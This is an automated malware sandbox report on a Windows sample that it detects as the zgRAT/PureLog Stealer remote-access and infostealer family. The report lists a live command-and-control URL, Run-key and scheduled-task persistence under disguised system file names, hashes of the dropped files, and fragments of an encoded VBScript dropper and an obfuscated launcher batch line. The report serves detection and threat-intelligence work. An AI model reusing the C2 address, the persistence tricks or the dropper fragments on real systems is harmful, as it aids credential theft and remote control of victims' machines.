001031cm.nyashteam.ru | 172.67.186.200 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://001031cm.nyashteam.ru/ | smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.w3. | dwm.exe, 00000024.00000002.2180283399.0000000002C43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://001031cm.nyashteam.ru | smartscreen.exe, 0000002A.00000002.2137127393.0000000003296000.00000004.00000800.00020000.00000000.sdmp, smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Portsessionsvc.exe, 00000007.00000002.2015114062.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.186.200 | 001031cm.nyashteam.ru | United States | 13335 | CLOUDFLARENETUS | true
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1581773
                                        Start date and time:2024-12-28 23:46:15 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 40s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:58
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:EjS7Q5fFCE.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:5fa3d2d795206f9981b7bd191c423d65.exe
                                        Detection:MAL
                                        Classification:mal100.spre.troj.expl.evad.winEXE@59/32@1/1
                                        EGA Information:
                                        • Successful, ratio: 14.3%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target Portsessionsvc.exe, PID 3412 because it is empty
                                        • Execution Graph export aborted for target Portsessionsvc.exe, PID 7864 because it is empty
                                        • Execution Graph export aborted for target ctfmon.exe, PID 5980 because it is empty
                                        • Execution Graph export aborted for target ctfmon.exe, PID 980 because it is empty
                                        • Execution Graph export aborted for target dwm.exe, PID 1220 because it is empty
                                        • Execution Graph export aborted for target dwm.exe, PID 1780 because it is empty
                                        • Execution Graph export aborted for target iEIWJugOSvvEyboGDFYpQ.exe, PID 2120 because it is empty
                                        • Execution Graph export aborted for target iEIWJugOSvvEyboGDFYpQ.exe, PID 6864 because it is empty
                                        • Execution Graph export aborted for target iEIWJugOSvvEyboGDFYpQ.exe, PID 7820 because it is empty
                                        • Execution Graph export aborted for target smartscreen.exe, PID 1028 because it is empty
                                        • Execution Graph export aborted for target smartscreen.exe, PID 2828 because it is empty
                                        • Execution Graph export aborted for target smartscreen.exe, PID 6348 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: EjS7Q5fFCE.exe
Time | Type | Description
17:47:50 | API Interceptor | 1x Sleep call for process: smartscreen.exe modified
22:47:39 | Task Scheduler | Run new task: ctfmon path: "C:\ComproviderComponentIntocommon\ctfmon.exe"
22:47:39 | Task Scheduler | Run new task: ctfmonc path: "C:\ComproviderComponentIntocommon\ctfmon.exe"
22:47:40 | Task Scheduler | Run new task: dwm path: "C:\Recovery\dwm.exe"
22:47:40 | Task Scheduler | Run new task: dwmd path: "C:\Recovery\dwm.exe"
22:47:40 | Task Scheduler | Run new task: iEIWJugOSvvEyboGDFYpQ path: "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
22:47:40 | Task Scheduler | Run new task: iEIWJugOSvvEyboGDFYpQi path: "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
22:47:40 | Task Scheduler | Run new task: Portsessionsvc path: "C:\ComproviderComponentIntocommon\Portsessionsvc.exe"
22:47:40 | Task Scheduler | Run new task: PortsessionsvcP path: "C:\ComproviderComponentIntocommon\Portsessionsvc.exe"
22:47:40 | Task Scheduler | Run new task: smartscreen path: "C:\Windows\Resources\Themes\smartscreen.exe"
22:47:40 | Task Scheduler | Run new task: smartscreens path: "C:\Windows\Resources\Themes\smartscreen.exe"
22:47:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Windows\Resources\Themes\smartscreen.exe"
22:47:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Recovery\dwm.exe"
22:47:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQ "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
22:48:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ComproviderComponentIntocommon\ctfmon.exe"
22:48:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Portsessionsvc "C:\ComproviderComponentIntocommon\Portsessionsvc.exe"
22:48:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Windows\Resources\Themes\smartscreen.exe"
22:48:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Recovery\dwm.exe"
22:48:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQ "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
22:48:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ComproviderComponentIntocommon\ctfmon.exe"
22:48:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Portsessionsvc "C:\ComproviderComponentIntocommon\Portsessionsvc.exe"
22:49:06 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Windows\Resources\Themes\smartscreen.exe"
22:49:14 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Recovery\dwm.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
172.67.186.200 | 6G8OR42xrB.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 895157cm.nyashteam.ru/videogeoflowertestuniversaldleLocalCentral.php
 | kqq1aAcVUQ.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal.php
                                        No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | VegaStealer_v2.exe | Get hash | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | Browse | 172.67.160.84
 | SharcHack.exe | Get hash | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | Browse | 172.67.160.84
 | aimware.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 172.67.132.55
 | https://belasting.online-factuur.com | Get hash | malicious | Unknown | Browse | 172.67.171.151
 | https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310 | Get hash | malicious | KnowBe4 | Browse | 1.1.1.1
 | gdi32.dll | Get hash | malicious | LummaC | Browse | 104.21.66.86
 | Loader.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
 | Crosshair-X.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
 | setup.msi | Get hash | malicious | Unknown | Browse | 172.67.165.214
 | !Set-up..exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.75.40
                                        No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Desktop\etRRuFlx.log | aimware.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | ZZ2sTsJFrt.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | r6cRyCpdfS.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | tBnELFfQoe.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | Z4D3XAZ2jB.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | 67VB5TS184.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | 4t8f8F3uT1.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | F3ePjP272h.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | cbCjTbodwa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
 | vb8DOBZQ4X.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with very long lines (716), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):716
                                                            Entropy (8bit):5.891747425043784
                                                            Encrypted:false
                                                            SSDEEP:12:dQ/5yL6+1zLkIc4oEmdWkIuFx6IGA1ZaIo5OP/0lIW3JH4/x0rMepZ:dQ/5D+hLjcCm1Q+PsVH4Z0YKZ
                                                            MD5:7B75F2F225AC4102B6CAA258662B9701
                                                            SHA1:3183F655B4D53624EF4E792A554EE7CB2DE6EDCF
                                                            SHA-256:EDB2026143986147269AA1CFDD9C74FD27912A00F4F073C92CAEE0BF00B2A26F
                                                            SHA-512:5CF63262A7CA3BFD3BA7A0CFC85F69579F72A06373D242642B33A2BEB000B2D88C4F5F1094E608A4051352A7F035ABD104BE854D7127B4AD324FFED8E4E20DE8
                                                            Malicious:false
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with very long lines (995), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):995
                                                            Entropy (8bit):5.91273221473692
                                                            Encrypted:false
                                                            SSDEEP:24:j38QAFz4ot2jvkxNqtXkkrQojPrQ3TcbXpMyLnw4K6IO:NABtCvkxct0kRrQ3obZM6X
                                                            MD5:F1610AA156D2E5678DC89D279036B05F
                                                            SHA1:273CC062C8E0FEEE415AA1BD41B997D548E4FC53
                                                            SHA-256:429F28575432E1084FBB6F4D22D67CBFABAF769A0EDD23918494CF5756390535
                                                            SHA-512:2FC9A62B085ED58C3C2C3A5C5C8A057F83863B6490CDCC9BF68E24DA628E77BF247098B2A00D0F6F577DB544B46E01135A641975B47020D13E697196476B6B73
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):216
                                                            Entropy (8bit):5.755360044405206
                                                            Encrypted:false
                                                            SSDEEP:6:GVwqK+NkLzWbH3WrFnBaORbM5nCiRe495Nl7s:G4MCzWLmhBaORbQCiRZB7s
                                                            MD5:0A78FBB0D4E74B92BB8163F85A68B1C1
                                                            SHA1:0F2A18DD700999F8D2437FDFD51530658BA16C89
                                                            SHA-256:2CB1279B2894F9C82363A474DB31FF99B655D64E17B1C8CFC13FAE1289DD06E9
                                                            SHA-512:9C819F6270B5159171D0D5BBB3DE21D49B355859D3B721EF61EA9F4FE9A4AA4B8152FCFEAF2D7EFBFF575B3A7CF29308DDAAFEEA1E470A555C7CC62D01F3F83B
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:#@~^vwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 1!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z/K:aDW7k9nD;WhwKxnUDqxDGmK::KU&zOL+Z/k4 (lOJB~!BPWC^/+kT0AAA==^#~@.
                                                            Process:C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):97
                                                            Entropy (8bit):5.016171512880101
                                                            Encrypted:false
                                                            SSDEEP:3:3MAAfv4yoikmKI9KTMfgTnEKLFgzYACsytIoUA:xAfv1oaT9KjEQqzYACsyLZ
                                                            MD5:B4699F0866C190887AA4B63E7AAF8990
                                                            SHA1:DE39CACA431F192F635C5A0FBE9CD9A45D40F6F3
                                                            SHA-256:767A170872554A812A5445C3437FB450947D2874131E7BD420FC5869021BD554
                                                            SHA-512:6A8B4B90A63C9E88C3999598F804F842F622365BAD96CB239BBAC4D87125ECBD468B5C8340E5476E53BE3DF86C4673414E96C99F202B88A109E1C47B58B26F7D
                                                            Malicious:false
                                                            Preview:%wRY%%tElTuHUIdtvf%..%BlVCCvx%"C:\ComproviderComponentIntocommon/Portsessionsvc.exe"%LCkJQHwzLMq%
                                                            Process:C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComproviderComponentIntocommon\ctfmon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComproviderComponentIntocommon\ctfmon.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):201
                                                            Entropy (8bit):5.619721378958909
                                                            Encrypted:false
                                                            SSDEEP:3:vcXpJt1Q6mESOh9CfEiXi/o9juflCZ/VOUkI86knSnK/OVoR6GMxRZg/:vcXpJwPOh9jMuNCJV726ty+FS
                                                            MD5:17B17B0FCD3EB0492D5454061175D5A0
                                                            SHA1:0C97A10085B32B62ACBF8DA2E9F302F2A1553222
                                                            SHA-256:4481002657193AA3EFBA27858C45D0C1FEBF7946A0DCD9AF17FFB046E7587D1F
                                                            SHA-512:F278C62AEC68535151204E89100FB33325E543B8D4CCC95D16EA5E202632333669AD19AA06E502D3850468CA08ED9F843242580F136A6F40FA94FD80D941444B
                                                            Malicious:false
                                                            Preview:cDm9rpwJ1drcouQOcNmuP5iaElgitGVcgg5wEncwFB4keTJSw3ckfb6hfM5FJOZuIO5HzeKzuzoNA86vcNvzou6EjXR1rXn0mJbPXBdStmzqwtghQKm6cjGXS0icMSHXLyl1grXbucGB4QR00ulhvrYCDE7gdAGbfce8HpAjwKM9dFcBirlcqjleZiyct08tWofcvTtLt
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with very long lines (574), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):574
                                                            Entropy (8bit):5.880290946093431
                                                            Encrypted:false
                                                            SSDEEP:12:M1JhFvcM0gEB+6X3PJE/ajwSFPcSwYmT03UFOZSAi8kIkv/pl4jms7aEj:qhVcM0gc+6HPJcajwSkSwYmT0EFOZSVu
                                                            MD5:280F80F3841F9C32BC80B9B749AEBB10
                                                            SHA1:93A5D596FE87EF52A5CC1BA4FA32F9C6DB389D49
                                                            SHA-256:AD3D512BFC3B50828CA80FFEFE22094CFE785490ADD8476D6DA67BD50BFE72D8
                                                            SHA-512:7C4BB424391A16D69465DD718CE0CD0A75CDD28F344A913E16B35F9D38A83B6B36DFEA5D8ED484F87501485DF6A5223735007C55D2084BEB2DB670ADE0C9CF08
                                                            Malicious:false
                                                            Preview:7l57vZnu51Ajj1iz5McmyjAPP8asnyB8B901y3MUt3kkuuJTLNzXCvuXkpsx84HGzChkAqAC9I349ZffyGha8n5POcQIKZVywevsMjTeMxY420YKKM81XrHMGSVha21kwFHfowTPxCNLPBXYEG77adaFWim3NvEU5xHws3gX3tEVd57E47dU44KSoCIFKZBB73Qb3kqKkjDqZFlalh9PSuZBmyIpuaNerCXkpfKURStV0e3iasdnZwtNePzEbAZJWj8WrBuGWo89AELI5jPC6jE5SKGapF2R3k8Qfg0Y7XQvxuMaDrJ2uXNxeCEh5UaQwqGaF4mYs0EjSTHi8qW86AgfXKwdcTdn698HowUJEuJ4SoeK4fjP7bUwKkD4HJ6ZWbmSVA4LVM4L0mNsqli6uOpepL6DsZB5yuh0BLz4lX3vhJ5iWUOgk9pIwHnJD0d6K9WGEXrfwoUWV47gQYrYKfUyEZE3hp0v46kiwyd9mst6pSw2KH3pJFvpohBoSx7GyjcZTZub4rvcwXJwnMtawKmyK53OxzqzvmIGzXivXcubTT2QYPBGEgUn6nOYff
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dwm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dwm.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with very long lines (521), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):521
                                                            Entropy (8bit):5.893484173965041
                                                            Encrypted:false
                                                            SSDEEP:12:ZLVdWGyvXSRIaVQr0arlec1FOxM4s9MoeGAjzgV10WTg2uoG:0vXSiaA0ih1FO4Hg6SWTg2uoG
                                                            MD5:52AF11A45C53DEE28CAF76B542FA6FD6
                                                            SHA1:3BC2562B51166DA44A994B4487B894267FF3A6BF
                                                            SHA-256:513643EB46D586208DA3E915984166D322DC972F24521335FC497BFEDB233410
                                                            SHA-512:9464BFF29C68AA65B78E3BCEF0BEDFC2F310E0FA563070B4862381E9D2F61487C009B83EFEC9C666DC36FDA221FA08F65E51F7A60B76999454DFEDFC05401AB3
                                                            Malicious:false
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1306
                                                            Entropy (8bit):5.353303787007226
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                            MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                            SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                            SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                            SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                            Malicious:false
